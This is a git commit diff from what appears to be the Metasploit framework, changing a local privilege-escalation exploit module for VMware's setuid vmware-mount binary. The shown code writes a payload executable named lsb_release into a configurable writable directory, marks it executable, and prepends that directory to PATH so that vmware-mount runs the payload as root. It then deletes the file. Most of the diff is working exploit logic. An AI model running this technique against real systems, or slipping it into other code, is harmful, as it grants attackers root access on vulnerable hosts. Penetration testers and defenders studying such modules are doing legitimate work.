Add configurable directory, rather than relying on the session working
directory.bug/bundler_fix
parent
c0be32eac1
commit
25ecf73d7d
|
@ -53,6 +53,9 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
'DisclosureDate' => "Aug 22 2013"
|
||||
}
|
||||
))
|
||||
register_options([
|
||||
OptString.new("WritableDir", [ true, "A directory where you can write files.", "/tmp" ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -68,13 +71,13 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
|
||||
end
|
||||
|
||||
write_file("lsb_release", generate_payload_exe)
|
||||
|
||||
cmd_exec("chmod +x lsb_release")
|
||||
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
|
||||
path = "#{datastore["WritableDir"]}"
|
||||
write_file("#{path}/lsb_release", generate_payload_exe)
|
||||
cmd_exec("chmod +x #{path}/lsb_release")
|
||||
cmd_exec("PATH=#{path}:$PATH /usr/bin/vmware-mount")
|
||||
# Delete it here instead of using FileDropper because the original
|
||||
# session can clean it up
|
||||
cmd_exec("rm -f lsb_release")
|
||||
cmd_exec("rm -f #{path}/lsb_release")
|
||||
end
|
||||
|
||||
def setuid?(remote_file)
|
||||
|
|
Loading…
Reference in New Issue